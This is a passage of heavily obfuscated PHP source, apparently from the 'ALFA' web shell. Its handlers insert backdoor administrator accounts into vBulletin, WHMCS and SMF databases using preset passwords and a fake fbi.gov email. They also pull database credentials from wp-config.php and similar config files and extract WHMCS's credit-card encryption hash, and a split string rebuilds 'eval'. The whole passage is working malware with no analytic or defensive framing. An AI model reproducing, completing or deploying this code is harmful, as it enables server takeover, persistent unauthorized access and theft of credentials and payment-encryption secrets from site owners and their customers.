"\151\x6e\x70\x75\x74\x56\x61\154\165\145" => "\x73\157\x6c\145\x76\x69\x73\x69\142\x6c\145", "\151\x6e\160\165\x74\x53\x69\x7a\145" => "\x35\60", "\144\x69\x73\141\142\x6c\145\144" => true)); goto XFgiM; XFgiM: create_table($table); goto PCdKd; lJ_VG: } goto HB3T9; sDwpz: alfafooter(); goto km3Z2; cHS3m: Alfa_Create_A_Tag("\x70\167\x63\150\141\x6e\147\x65\162", $vals); goto nDQbL; aSe6C: echo "\x3c\57\x64\x69\166\x3e"; goto sDwpz; nDQbL: echo "\74\57\150\x33\76\74\57\x63\x65\x6e\x74\145\162\x3e"; goto CG8KE; ox10V: if ($_POST["\141\x6c\x66\141\x34"] && $_POST["\141\x6c\x66\x61\x34"] == "\166\142") { goto u646v; x69Db: create_table($table); goto qV9cf; UZI8k: $table = array("\x74\x64\x31" => array("\x63\157\x6c\x6f\x72" => "\106\x46\106\106\106\106", "\x74\x64\116\x61\155\145" => "\115\x79\x73\x71\154\40\110\x6f\163\164", "\x69\x64" => "\x64\x62\137\x68\x6f\163\164", "\x69\x6e\160\x75\164\x4e\x61\x6d\x65" => "\x6c\157\143\141\x6c\150\x6f\x73\164", "\x69\x6e\x70\165\164\126\141\154\165\145" => "\x6c\157\143\141\x6c\x68\x6f\163\x74", "\151\x6e\160\165\164\x53\x69\x7a\x65" => "\x35\x30"), "\164\x64\62" => array("\143\x6f\x6c\157\162" => "\x46\x46\x46\106\106\106", "\164\x64\116\x61\155\x65" => "\x44\142\40\x4e\141\x6d\x65", "\151\x64" => "\144\x62\137\x6e\x61\x6d\x65", "\x69\156\x70\165\164\x4e\141\x6d\x65" => "\x64\x61\164\141\142\x61\163\x65", "\151\156\160\165\164\x56\141\154\165\145" => '', "\151\x6e\160\x75\x74\123\x69\x7a\145" => "\65\60"), "\164\144\x33" => array("\x63\157\154\x6f\x72" => "\x46\x46\106\x46\106\x46", "\x74\144\116\x61\x6d\x65" => "\x44\142\40\x55\163\145\x72", "\x69\x64" => "\x64\142\x5f\x75\163\145\x72", "\x69\156\x70\x75\x74\116\x61\x6d\x65" => "\165\x73\x65\162\x6e\141\155\145", "\x69\x6e\x70\x75\x74\126\141\154\165\145" => '', "\x69\156\x70\165\x74\123\151\172\x65" => "\65\x30"), "\164\x64\64" => array("\143\157\x6c\x6f\x72" => "\106\x46\106\x46\x46\x46", "\164\x64\116\x61\x6d\x65" => "\x44\x62\40\120\x61\163\163", "\151\x64" => "\144\x62\x5f\160\x77", "\151\x6e\x70\x75\164\x4e\141\x6d\x65" => "\160\x61\x73\x73\x77\157\162\144", "\x69\x6e\x70\x75\x74\126\141\x6c\x75\x65" => '', "\x69\156\160\x75\x74\x53\x69\x7a\x65" => "\x35\x30"), "\x74\144\65" => array("\x63\157\x6c\x6f\x72" => "\106\106\x46\106\106\106", "\164\144\x4e\x61\155\x65" => "\x54\x61\x62\x6c\145\x20\x50\x72\x65\x66\x69\x78", "\x69\144" => "\144\142\137\160\x72\x65\x66\x69\x78", "\151\156\160\x75\x74\x4e\141\x6d\x65" => "\x70\162\x65\x66\x69\170", "\151\x6e\160\x75\x74\x56\x61\154\x75\x65" => '', "\x69\x6e\x70\x75\x74\x53\151\172\x65" => "\x35\x30"), "\x74\x64\66" => array("\143\x6f\x6c\x6f\162" => "\106\x46\60\x30\60\60", "\164\144\116\x61\155\x65" => "\x41\x64\x6d\151\x6e\x20\125\163\145\162", "\x69\156\x70\x75\164\116\x61\155\145" => "\141\144\155\151\x6e", "\x69\156\160\165\x74\x56\141\x6c\165\145" => "\x61\x64\155\x69\156", "\151\156\160\x75\x74\123\151\x7a\x65" => "\x35\x30"), "\x74\144\x37" => array("\x63\x6f\x6c\157\162" => "\106\x46\x30\x30\60\60", "\164\x64\116\x61\155\145" => "\x41\x64\x6d\151\156\40\120\141\x73\x73", "\x69\156\160\165\164\116\141\x6d\x65" => "\150\x69", "\151\156\x70\165\x74\126\141\x6c\x75\145" => "\163\157\154\145\166\151\163\x69\x62\x6c\x65", "\x69\156\160\165\x74\123\x69\x7a\x65" => "\x35\x30", "\x64\x69\163\141\142\x6c\145\144" => true), "\x74\x64\70" => array("\143\x6f\154\x6f\x72" => "\x46\x46\60\60\60\x30", "\164\x64\116\141\x6d\145" => "\x41\144\x6d\151\x6e\40\x45\x6d\141\x69\154", "\x69\156\160\x75\164\116\141\x6d\145" => "\x65\155\141\151\154", "\x69\x6e\160\x75\164\x56\x61\154\x75\145" => "\x73\x6f\154\x65\166\x69\163\x69\x62\154\x65\x40\146\x62\151\x2e\147\157\x76", "\x69\156\160\x75\x74\123\151\172\145" => "\65\60")); goto x69Db; m9Afv: if ($_POST["\141\154\146\141\x31"] && $_POST["\x61\154\146\x61\x31"] == "\76\x3e") { goto S8ZmH; iCr9c: $solevisible = @mysqli_query($conn, "\163\x65\154\145\x63\x74\40\165\x73\x65\x72\x69\x64\40\146\162\157\155\40{$prefix}\x75\x73\x65\x72\x20\167\150\145\x72\145\40\x75\x73\145\x72\156\x61\155\145\x3d\47" . $admin . "\x27") or die(mysqli_error($conn)); goto OEe9C; yx5gq: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto br63y; S8ZmH: $localhost = $_POST["\141\x6c\x66\x61\x32"]; goto r2DHL; br63y: $solevisible = @mysqli_query($conn, "\x69\156\x73\x65\x72\x74\40\x69\x6e\x74\157\x20{$prefix}\x75\x73\x65\162\x20\x28\x75\x73\145\162\151\x64\54\165\163\145\162\147\x72\x6f\165\160\151\x64\54\x75\x73\145\162\x6e\141\155\145\x2c\160\141\x73\163\x77\157\x72\144\54\x73\x61\x6c\x74\x2c\145\155\x61\x69\154\x2c\x70\x61\x73\x73\x77\157\x72\144\x64\x61\164\x65\54\152\x6f\151\156\144\x61\164\x65\51\x20\x76\141\154\165\x65\163\50\x6e\165\x6c\x6c\x2c\47\x36\x27\54\47{$admin}\x27\x2c\47\65\x32\x65\x32\70\142\x37\70\146\65\x35\x36\64\x31\143\144\64\x36\x31\x38\141\144\61\x61\x32\x30\146\65\146\144\65\x63\x27\54\47\x58\167\x7c\x49\x62\107\114\150\124\121\x41\x2d\101\167\101\160\126\x76\x3e\x36\x31\x79\x5e\x28\172\135\52\74\x51\x4e\x27\x2c\47{$SQL}\x27\x2c\47" . date("\x59\55\155\x2d\144") . "\47\54\47" . time() . "\47\51") or die(mysqli_error($conn)); goto iCr9c; ymvBX: $solevisible = @mysqli_query($conn, "\x69\156\163\145\x72\164\40\x69\156\x74\x6f\x20{$prefix}\x61\144\x6d\x69\156\151\x73\164\162\x61\x74\157\162\40\50\x75\163\145\162\x69\x64\x2c\x61\144\x6d\151\x6e\160\x65\162\155\x69\163\x73\151\157\156\x73\51\40\166\141\154\x75\145\163\x28\x27" . $res . "\47\x2c\47\61\x36\x37\64\64\64\x34\x34\x27\x29") or die(mysqli_error($conn)); goto SAp0y; r2DHL: $database = $_POST["\141\x6c\146\x61\63"]; goto WMuzP; yJQt1: $password = $_POST["\x61\x6c\146\141\66"]; goto vS2Qa; P0x8A: if ($sole == 1) { $solevis = mysqli_fetch_assoc($solevisible); $res = $solevis["\x75\x73\x65\162\x69\x64"]; } goto ymvBX; WMuzP: $username = $_POST["\141\x6c\x66\x61\65"]; goto yJQt1; SAp0y: if ($solevisible) { __alert("\123\x75\143\143\x65\x73\163\56\x2e\x2e\40" . $admin . "\40\151\x73\x20\143\x72\145\141\164\145\144\x2e\x2e\x2e"); } goto Th22q; bjYEm: $SQL = $_POST["\141\x6c\146\141\71"]; goto yx5gq; vS2Qa: $prefix = $_POST["\x61\154\146\141\x37"]; goto pQXOw; OEe9C: $sole = mysqli_num_rows($solevisible); goto P0x8A; pQXOw: $admin = $_POST["\x61\x6c\x66\x61\70"]; goto bjYEm; Th22q: } goto AGMoW; qV9cf: echo "\x3c\x70\76\74\x69\156\x70\165\x74\40\166\x61\x6c\x75\x65\75\x22\x20\x22\40\156\141\x6d\145\75\x22\163\x65\156\x64\x22\40\x74\x79\x70\x65\x3d\42\163\x75\142\155\151\x74\x22\76\74\x2f\x70\x3e\74\57\146\x6f\162\x6d\76\x3c\57\143\145\156\164\145\162\76"; goto m9Afv; u646v: echo __pre() . "\x3c\x63\x65\156\x74\145\x72\76\x3c\x63\x65\156\x74\x65\x72\76\x3c\144\x69\x76\40\143\154\141\163\163\x3d\42\164\170\164\x66\157\156\x74\137\x68\145\141\x64\x65\x72\42\76\x7c\40\x76\x42\165\x6c\154\x65\x74\151\156\40\174\x3c\144\x69\166\76\74\x70\x3e" . getConfigHtml("\x76\142") . "\74\57\160\x3e\74\146\x6f\x72\155\x20\x6f\156\x53\x75\x62\x6d\151\x74\75\42\x67\x28\x27\x70\167\143\150\x61\156\147\145\162\47\54\x6e\x75\154\x6c\54\47\76\x3e\47\x2c\x74\150\x69\x73\x2e\x6c\157\x63\x61\154\150\157\x73\164\x2e\166\x61\x6c\165\145\54\x74\x68\x69\163\56\144\141\164\x61\x62\x61\x73\x65\x2e\x76\141\x6c\165\145\54\x27\x76\x62\x27\x2c\164\x68\151\163\x2e\x75\163\145\x72\156\141\x6d\145\x2e\x76\141\154\x75\145\x2c\164\x68\151\x73\56\x70\x61\163\x73\167\157\x72\144\x2e\x76\x61\x6c\165\x65\54\164\x68\x69\x73\56\x70\162\145\146\x69\170\x2e\166\x61\x6c\x75\145\x2c\x74\x68\151\x73\x2e\141\144\x6d\x69\x6e\x2e\x76\x61\154\x75\145\x2c\x74\150\x69\163\x2e\145\155\x61\x69\154\x2e\166\141\x6c\165\145\x29\73\40\x72\x65\x74\165\x72\156\40\x66\x61\154\x73\x65\73\x22\x20\x6d\x65\x74\150\x6f\144\75\42\x50\x4f\x53\x54\x22\76"; goto UZI8k; AGMoW: } goto AvKAd; nHzbN: if (isset($_POST["\x61\154\x66\141\x36"]) && $_POST["\141\x6c\x66\141\x36"] == "\167\x68\x6d\x63\x73") { goto j823d; fzemi: $table = array("\164\144\x31" => array("\x63\157\x6c\157\162" => "\106\106\106\x46\106\106", "\164\x64\x4e\141\155\145" => "\x4d\171\x73\x71\154\x20\x48\x6f\163\x74", "\x69\144" => "\x64\142\x5f\x68\x6f\x73\x74", "\x69\x6e\x70\165\x74\x4e\141\155\145" => "\154\x6f\x63\141\154\150\157\x73\164", "\151\x6e\160\x75\x74\126\141\x6c\x75\x65" => "\154\x6f\x63\141\x6c\150\x6f\163\x74", "\x69\x6e\x70\165\x74\x53\x69\x7a\x65" => "\65\60"), "\164\144\x32" => array("\143\157\x6c\x6f\x72" => "\106\x46\106\106\106\x46", "\x74\x64\116\x61\155\x65" => "\104\142\x20\116\x61\155\x65", "\x69\144" => "\x64\142\137\x6e\x61\x6d\145", "\x69\156\160\x75\164\116\x61\155\x65" => "\144\141\x74\141\x62\x61\x73\145", "\151\x6e\x70\165\164\x56\141\x6c\165\145" => '', "\x69\156\x70\x75\164\x53\x69\x7a\145" => "\x35\x30"), "\164\x64\x33" => array("\x63\x6f\x6c\x6f\162" => "\x46\x46\106\x46\x46\106", "\164\x64\x4e\x61\x6d\145" => "\104\x62\x20\x55\163\145\x72", "\151\144" => "\144\x62\x5f\x75\163\145\x72", "\x69\156\160\x75\164\116\141\x6d\x65" => "\165\x73\x65\x72\156\141\155\145", "\151\x6e\x70\165\164\x56\141\154\x75\145" => '', "\151\x6e\160\x75\x74\x53\151\x7a\x65" => "\65\x30"), "\x74\144\x34" => array("\x63\157\x6c\x6f\x72" => "\x46\x46\x46\106\106\106", "\x74\x64\x4e\x61\155\145" => "\x44\142\40\x50\141\x73\x73", "\151\144" => "\144\x62\137\160\x77", "\x69\156\x70\x75\164\116\x61\x6d\x65" => "\160\x61\x73\163\x77\157\x72\x64", "\x69\156\160\x75\164\x56\141\x6c\x75\145" => '', "\151\156\x70\x75\164\x53\151\172\x65" => "\x35\60"), "\x74\x64\x36" => array("\x63\157\x6c\x6f\162" => "\x46\x46\x30\60\x30\x30", "\164\x64\x4e\141\155\145" => "\x41\x64\155\151\x6e\x20\125\163\145\162", "\x69\156\160\165\x74\x4e\x61\x6d\x65" => "\141\x64\x6d\151\156", "\151\156\x70\x75\x74\126\x61\154\165\145" => "\141\144\155\151\156", "\151\156\160\x75\x74\123\x69\x7a\145" => "\65\x30"), "\x74\144\x37" => array("\x63\157\x6c\x6f\162" => "\x46\x46\x30\x30\60\60", "\x74\x64\116\141\x6d\145" => "\101\144\155\x69\x6e\x20\x50\141\163\x73", "\x69\156\160\165\164\116\141\155\x65" => "\x74\x6f\146\164\157\x66", "\151\156\x70\x75\x74\126\x61\154\x75\145" => "\163\x6f\154\145\x76\x69\x73\x69\142\154\x65", "\151\156\x70\165\164\x53\x69\x7a\x65" => "\65\x30", "\x64\151\x73\x61\x62\154\145\144" => true), "\164\144\70" => array("\x63\157\x6c\x6f\x72" => "\106\106\60\x30\60\x30", "\164\144\116\x61\155\145" => "\101\x64\155\151\156\40\105\155\141\x69\154", "\x69\x6e\160\x75\164\x4e\141\155\145" => "\145\x6d\x61\x69\x6c", "\151\x6e\160\x75\164\126\141\x6c\x75\145" => "\163\157\x6c\145\x76\x69\163\x69\x62\x6c\x65\x40\146\142\151\x2e\x67\157\x76", "\x69\156\160\165\x74\x53\x69\x7a\145" => "\65\60")); goto CkHVE; j823d: echo __pre() . "\74\x63\145\156\164\x65\162\76\74\144\x69\166\x20\x63\154\x61\x73\163\x3d\x22\x74\x78\x74\x66\x6f\x6e\164\137\150\x65\141\x64\x65\x72\42\x3e\x7c\x20\x57\x68\155\x63\x73\40\x7c\74\57\x64\151\166\76\x3c\x70\x3e\x3c\160\76" . getConfigHtml("\167\x68\155\143\163") . "\74\57\x70\76\x3c\x66\157\x72\x6d\x20\x6f\x6e\123\x75\142\155\151\164\75\x22\147\50\47\x70\167\143\150\141\156\x67\145\162\x27\x2c\156\165\154\154\x2c\47\x3e\76\x27\x2c\164\150\x69\163\56\154\x6f\143\x61\x6c\150\157\x73\x74\x2e\x76\x61\x6c\165\x65\x2c\x74\x68\151\x73\56\x64\x61\164\141\x62\x61\163\145\56\x76\x61\154\165\145\54\164\x68\x69\163\x2e\x75\163\x65\x72\156\x61\155\x65\56\166\x61\154\165\x65\54\x74\150\x69\x73\x2e\x70\x61\163\163\167\157\x72\x64\56\x76\141\x6c\x75\145\x2c\x27\167\x68\x6d\x63\163\47\x2c\x6e\165\154\154\54\164\150\151\x73\56\x61\144\x6d\151\x6e\x2e\166\141\x6c\x75\145\x2c\x74\x68\151\163\56\145\x6d\x61\x69\x6c\x2e\x76\141\154\165\145\x29\x3b\x20\162\145\164\x75\162\156\40\x66\141\x6c\163\x65\x3b\x22\40\155\145\164\150\x6f\144\75\x22\x50\117\x53\x54\42\x3e"; goto fzemi; CkHVE: create_table($table); goto o0Oqj; y9TUT: if ($_POST["\x61\154\x66\x61\x31"] && $_POST["\141\154\x66\x61\61"] == "\x3e\x3e") { goto eggxk; eKWdd: $SQL = $_POST["\141\x6c\x66\x61\x39"]; goto fOhpC; fOhpC: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto sdAkc; I7SgF: $admin = $_POST["\141\154\x66\141\x38"]; goto eKWdd; IgX_N: $database = $_POST["\x61\154\x66\141\63"]; goto Z4R_8; mfGSA: $password = $_POST["\x61\x6c\x66\141\65"]; goto I7SgF; sdAkc: $solevisible = @mysqli_query($conn, "\x69\x6e\163\145\x72\164\x20\x69\156\164\157\x20\x74\x62\x6c\141\x64\x6d\151\x6e\163\x20\50\x69\x64\54\162\x6f\154\x65\151\144\54\165\x73\145\162\156\141\155\x65\54\x70\x61\163\163\167\x6f\x72\x64\54\145\x6d\x61\x69\154\x2c\164\145\x6d\160\x6c\x61\164\x65\54\150\x6f\155\x65\167\x69\144\147\145\164\x73\51\x20\x76\141\x6c\165\x65\163\50\x6e\165\154\154\54\x27\x31\47\x2c\47" . $admin . "\x27\54\x27\144\x34\x61\65\x39\x30\143\141\x61\x63\143\60\142\x65\x35\x35\x65\x66\x32\70\66\145\64\60\141\x39\64\65\145\141\64\65\x27\54\x27" . $SQL . "\47\x2c\47\x62\x6c\145\x6e\144\47\x2c\x27\x67\145\164\164\x69\x6e\147\137\163\x74\141\162\164\145\144\72\164\162\165\x65\54\157\162\x64\145\162\163\x5f\x6f\x76\145\162\x76\x69\145\x77\72\x74\162\x75\145\54\x73\x75\x70\x70\x6f\x72\164\164\151\x63\x6b\145\164\163\x5f\x6f\166\x65\162\166\151\x65\x77\72\164\x72\165\145\x2c\155\x79\137\156\x6f\x74\x65\x73\x3a\x74\162\x75\x65\54\x63\154\x69\x65\156\x74\137\141\143\x74\x69\166\151\x74\171\72\164\x72\165\x65\54\157\x70\145\x6e\137\151\x6e\x76\x6f\x69\143\145\163\x3a\164\x72\165\x65\54\141\143\x74\151\x76\x69\164\x79\x5f\154\x6f\x67\72\164\x72\x75\x65\x7c\151\156\x63\x6f\x6d\x65\x5f\x6f\x76\145\x72\166\x69\x65\x77\72\164\162\x75\145\54\163\x79\x73\x74\145\155\137\x6f\166\x65\x72\x76\x69\145\x77\x3a\x74\162\165\x65\54\167\x68\155\143\163\137\156\145\x77\163\72\164\x72\x75\x65\54\x73\x79\163\x69\x6e\x66\157\x3a\x74\162\165\145\54\x61\x64\155\151\156\x5f\x61\143\x74\151\x76\151\x74\171\72\x74\x72\x75\x65\x2c\x74\x6f\x64\x6f\137\154\x69\163\x74\x3a\164\x72\165\x65\x2c\156\x65\x74\167\157\162\153\x5f\163\164\x61\164\x75\x73\x3a\x74\162\x75\145\54\x69\156\143\x6f\x6d\145\137\146\x6f\x72\145\143\141\x73\x74\72\x74\162\165\x65\174\47\x29") or die(mysqli_error($conn)); goto nunca; eggxk: $localhost = $_POST["\141\x6c\x66\141\62"]; goto IgX_N; Z4R_8: $username = $_POST["\x61\154\x66\x61\x34"]; goto mfGSA; nunca: if ($solevisible) { __alert("\x53\165\x63\143\145\x73\x73\56\56\56\40" . $admin . "\40\151\x73\40\143\162\145\141\164\145\x64\x2e\x2e\x2e"); } goto hZyCk; hZyCk: } goto lxlDU; o0Oqj: echo "\74\x70\x3e\74\x69\156\x70\x75\164\40\166\x61\x6c\x75\145\x3d\42\40\x22\x20\x6e\141\x6d\145\75\42\163\x65\156\x64\42\40\164\x79\160\145\75\42\163\165\x62\155\x69\164\42\x3e\74\57\160\76\x3c\57\x66\x6f\162\155\x3e\x3c\57\x63\145\156\x74\145\162\x3e"; goto y9TUT; lxlDU: } goto GMWFM; HB3T9: if (isset($_POST["\x61\154\x66\141\x31\60"]) && $_POST["\141\x6c\x66\x61\x31\60"] == "\163\x6d\x66") { goto zjMtq; LWEXG: create_table($table); goto uu2vI; uu2vI: echo "\74\x70\76\74\151\x6e\x70\x75\x74\40\x76\141\154\165\145\x3d\x22\x20\x22\40\x6e\141\x6d\x65\x3d\x22\163\145\156\x64\42\40\x74\171\x70\145\x3d\x22\x73\x75\142\x6d\151\x74\42\76\x3c\x2f\160\x3e\74\x2f\146\x6f\162\x6d\76\74\57\x63\145\x6e\x74\x65\162\x3e"; goto CqvlQ; CqvlQ: if ($_POST["\x61\x6c\x66\141\x31"] && $_POST["\141\154\x66\141\x31"] == "\76\76") { goto KVFv3; cVnl2: $setpwAlg = sha1(strtolower($admin) . "\163\157\154\145\166\151\x73\151\x62\154\x65"); goto p9zZ_; X8NFt: $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); goto cVnl2; K9rUi: if ($solevisible) { __alert("\123\x75\x63\x63\145\x73\x73\56\56\56\x20" . $admin . "\x20\151\x73\x20\x63\162\145\141\x74\145\144\x2e\x2e\56"); } goto gNR7_; KVFv3: $localhost = $_POST["\141\x6c\x66\x61\x32"]; goto SET6A; EteeP: $username = $_POST["\141\154\x66\141\x35"]; goto SFAJm; h6nlx: $prefix = $_POST["\x61\154\x66\x61\x37"]; goto YKcA4; p9zZ_: $solevisible = @mysqli_query($conn, "\x69\x6e\163\145\162\x74\x20\151\156\x74\157\x20{$prefix}\x6d\x65\155\x62\145\162\163\x20\x28\x69\144\137\x6d\x65\155\x62\x65\x72\x2c\x6d\145\x6d\x62\145\x72\137\156\x61\155\145\x2c\x69\x64\137\x67\162\x6f\x75\x70\x2c\x72\x65\x61\154\x5f\156\x61\155\x65\54\160\x61\x73\x73\167\144\54\x65\x6d\x61\151\154\x5f\141\x64\144\x72\x65\163\163\x29\40\x76\141\x6c\165\x65\163\50\156\x75\x6c\154\x2c\x27{$admin}\x27\x2c\x27\x31\47\54\47{$admin}\47\x2c\47{$setpwAlg}\x27\x2c\x27\163\x6f\154\x65\x76\151\163\x69\142\x6c\145\x40\146\142\151\x2e\147\157\x76\47\51") or die(mysqli_error($conn)); goto K9rUi; SET6A: $database = $_POST["\x61\x6c\146\141\63"]; goto EteeP; YKcA4: $admin = $_POST["\141\154\146\141\x38"]; goto X8NFt; SFAJm: $password = $_POST["\x61\154\146\141\66"]; goto h6nlx; gNR7_: } goto fvCtZ; NNyEK: $table = array("\164\x64\x31" => array("\x63\157\154\x6f\x72" => "\x46\x46\106\x46\106\x46", "\x74\x64\116\141\x6d\145" => "\115\x79\x73\x71\x6c\x20\110\x6f\163\164", "\151\144" => "\x64\x62\137\150\x6f\x73\x74", "\151\x6e\160\x75\x74\x4e\141\155\x65" => "\154\157\143\141\154\x68\157\163\x74", "\151\x6e\x70\x75\x74\x56\141\154\x75\145" => "\x6c\157\143\x61\x6c\150\157\x73\164", "\x69\156\x70\x75\x74\123\x69\x7a\145" => "\65\60"), "\164\x64\x32" => array("\x63\x6f\154\157\162" => "\106\x46\106\x46\x46\x46", "\x74\144\116\141\x6d\x65" => "\104\x62\40\x4e\141\155\x65", "\x69\144" => "\x64\x62\x5f\156\141\x6d\x65", "\151\156\160\x75\x74\116\141\155\145" => "\144\x61\x74\x61\x62\x61\x73\x65", "\151\156\160\x75\164\126\x61\x6c\165\x65" => '', "\x69\x6e\160\165\x74\x53\151\172\x65" => "\x35\x30"), "\164\x64\x33" => array("\143\157\154\157\162" => "\x46\x46\106\x46\x46\x46", "\164\x64\116\x61\x6d\x65" => "\x44\142\40\x55\x73\145\162", "\151\x64" => "\144\142\137\165\x73\145\x72", "\151\156\160\165\164\116\141\155\145" => "\x75\x73\145\162\x6e\141\155\x65", "\151\x6e\160\x75\164\x56\x61\154\x75\145" => '', "\151\156\x70\165\164\123\x69\172\145" => "\65\x30"), "\164\144\64" => array("\x63\x6f\x6c\157\x72" => "\106\x46\x46\106\106\106", "\164\x64\x4e\x61\x6d\145" => "\104\142\40\x50\141\x73\x73", "\x69\x64" => "\144\142\x5f\160\x77", "\x69\x6e\x70\165\x74\116\141\x6d\145" => "\160\141\163\x73\167\x6f\162\144", "\x69\x6e\x70\165\164\x56\141\x6c\x75\145" => '', "\x69\x6e\x70\x75\x74\x53\151\172\x65" => "\65\60"), "\164\144\65" => array("\143\157\154\157\162" => "\x46\x46\x46\x46\106\106", "\x74\144\116\141\155\145" => "\x54\x61\142\154\x65\40\x50\162\x65\146\151\170", "\151\x64" => "\144\142\x5f\x70\162\x65\146\151\170", "\151\x6e\160\165\x74\x4e\x61\x6d\x65" => "\160\x72\145\x66\151\x78", "\x69\x6e\160\165\164\x56\141\154\x75\145" => "\163\x6d\x66\x5f", "\x69\x6e\x70\x75\x74\x53\151\x7a\145" => "\65\60"), "\x74\144\x36" => array("\143\157\154\157\x72" => "\106\x46\x30\60\x30\60", "\x74\x64\x4e\x61\155\145" => "\x41\x64\155\x69\x6e\x20\x55\163\x65\x72", "\x69\x6e\x70\165\x74\116\141\x6d\x65" => "\x61\x64\x6d\x69\156", "\151\x6e\160\x75\164\x56\x61\x6c\x75\145" => "\x61\x64\155\151\x6e", "\151\x6e\x70\165\x74\123\151\x7a\x65" => "\x35\x30"), "\164\x64\67" => array("\143\x6f\x6c\x6f\x72" => "\x46\106\60\60\60\60", "\x74\144\116\141\x6d\145" => "\101\x64\155\151\x6e\40\x50\x61\163\x73", "\x69\x6e\x70\x75\164\116\x61\x6d\145" => "\x68\151", "\x69\156\160\x75\x74\126\141\x6c\165\145" => "\163\x6f\154\145\x76\x69\163\x69\x62\154\145", "\151\x6e\x70\165\x74\123\151\172\145" => "\x35\60", "\144\x69\163\141\142\x6c\145\144" => true)); goto LWEXG; zjMtq: echo __pre() . "\x3c\x63\145\x6e\x74\145\x72\76\x3c\143\145\x6e\x74\x65\162\76\x3c\x64\151\x76\40\143\154\x61\x73\x73\x3d\x22\x74\170\x74\146\157\x6e\x74\x5f\150\145\x61\x64\145\162\42\76\174\40\123\x4d\x46\x20\x7c\x3c\x2f\144\x69\166\x3e\x3c\160\x3e\74\160\x3e" . getConfigHtml("\x73\155\x66") . "\74\x2f\x70\76\74\x66\x6f\x72\x6d\x20\157\x6e\123\x75\x62\155\x69\164\x3d\42\147\50\x27\x70\167\143\x68\141\156\147\x65\x72\x27\x2c\x6e\x75\x6c\x6c\54\47\76\76\x27\x2c\x74\x68\x69\163\x2e\154\x6f\143\x61\154\150\157\x73\164\x2e\x76\141\154\x75\145\x2c\164\x68\x69\163\56\144\x61\x74\x61\142\x61\x73\x65\x2e\166\x61\x6c\165\145\x2c\x6e\x75\154\x6c\54\x74\150\151\163\x2e\165\x73\x65\162\156\x61\x6d\x65\x2e\166\141\154\165\x65\54\164\150\x69\x73\x2e\x70\141\x73\163\167\x6f\x72\x64\56\166\141\x6c\x75\145\54\164\x68\151\163\x2e\160\x72\145\x66\x69\x78\56\x76\141\154\165\x65\54\164\150\151\163\x2e\141\144\155\x69\156\x2e\x76\x61\x6c\x75\x65\54\156\165\154\x6c\54\x27\x73\x6d\146\x27\x29\x3b\x20\x72\145\164\165\x72\x6e\x20\146\141\x6c\x73\x65\73\42\40\x6d\145\164\x68\x6f\144\75\x22\120\x4f\123\124\42\x3e"; goto NNyEK; fvCtZ: } goto aSe6C; km3Z2: } goto fQk2e; PTOoj: $default_charset = "\127\x69\156\x64\x6f\x77\163\x2d\61\62\65\61"; goto PHDKT; oq_nl: $CyvIHOdCHU = "\145" . "\x76\x61" . "\x6c" . ''; goto szIkW; i0AIl: function alfaGetConfig() { goto H4L5m; Q9dxZ: if (isset($prefix)) { if (preg_match($prefix, $file, $mach)) { $data["\160\x72\x65\x66\x69\170"] = $mach[$cprefix]; } } goto Yp_MD; cmhva: $srch_name = $config[$cms]["\144\142\x6e\x61\155\145"][0]; goto qaCD8; aTvsb: $srch_user = $config[$cms]["\144\142\x75\x73\145\x72"][0]; goto cmhva; wg3Ep: $path = trim($_POST["\141\154\x66\141\x32"]); goto sRvuS; Yp_MD: if ($cms == "\167\x68\x6d\x63\x73") { if (preg_match($config[$cms]["\x63\143\137\145\156\143\162\171\160\x74\151\x6f\156\x5f\x68\x61\x73\150"][0], $file, $mach)) { $data["\x63\x63\x5f\x65\156\143\x72\x79\x70\x74\x69\x6f\156\x5f\x68\141\x73\150"] = $mach[3]; } } goto fV5NP; eA5O7: $file = $config[$cms]["\146\x69\154\x65"]; goto lUUUC; vACUV: $cpw = $config[$cms]["\x64\142\x70\167"][1]; goto EZTwV; qaCD8: $srch_pw = $config[$cms]["\x64\x62\160\x77"][0]; goto gX1pl; Ty22b: $cname = $config[$cms]["\144\142\x6e\x61\x6d\145"][1]; goto vACUV; EZTwV: $cprefix = $config[$cms]["\160\162\145\x66\151\x78"][1]; goto q6fPv; KGKqW: $srch_host = $config[$cms]["\150\x6f\x73\164"][0]; goto aTvsb; fV5NP: echo json_encode($data); goto r89R9; sRvuS: $config = array("\167\160" => array("\x66\x69\154\145" => "\x2f\167\160\55\143\157\156\x66\151\x67\x2e\160\x68\x70", "\x68\157\x73\x74" => array("\x2f\x64\145\146\x69\156\x65\134\x28\x27\104\102\x5f\x48\x4f\123\124\x27\x2c\50\134\163\53\x29\x28\x3f\72\x27\x7c\x22\x29\50\56\52\x3f\51\x28\77\x3a\x27\174\42\51\x5c\x29\x3b\x2f", 2), "\x64\x62\x6e\x61\155\x65" => array("\x2f\x64\x65\146\x69\156\145\x5c\x28\x27\104\x42\137\x4e\101\x4d\105\x27\x2c\50\134\x73\x2b\51\x28\77\72\47\174\x22\x29\x28\x2e\x2a\77\51\50\77\72\x27\174\x22\51\134\51\x3b\x2f", 2), "\x64\x62\165\163\x65\x72" => array("\57\144\145\146\151\156\145\134\50\x27\x44\102\x5f\x55\x53\105\x52\47\54\50\x5c\163\x2b\x29\50\x3f\x3a\x27\174\x22\x29\50\x2e\52\x3f\51\50\x3f\72\x27\x7c\42\51\x5c\x29\73\x2f", 2), "\144\x62\x70\x77" => array("\57\x64\x65\146\151\156\145\x5c\50\47\104\x42\137\x50\x41\x53\123\x57\x4f\122\x44\47\x2c\50\134\163\53\x29\x28\77\72\47\174\42\51\x28\56\x2a\x3f\51\50\77\72\x27\174\42\51\x5c\x29\73\57", 2), "\x70\162\145\146\151\170" => array("\57\x74\x61\x62\154\145\x5f\x70\162\145\x66\x69\x78\50\134\x73\x2b\x29\x3d\50\134\163\53\51\x28\x3f\x3a\x27\x7c\42\51\50\56\52\77\x29\50\77\72\47\174\x22\x29\x3b\57", 3)), "\x64\x72\x75\x70\x61\154" => array("\146\151\154\145" => "\57\143\x6f\156\x66\151\x67\x2e\x70\x68\x70", "\x68\157\163\x74" => array("\57\x64\x65\x66\x69\x6e\x65\x5c\x28\x27\104\x42\x5f\110\x4f\x53\x54\x4e\101\x4d\x45\x27\x2c\50\134\x73\53\51\x28\x3f\x3a\47\x7c\x22\51\x28\56\52\x3f\51\x28\x3f\x3a\47\174\x22\51\134\51\73\x2f", 2), "\144\142\156\141\x6d\x65" => 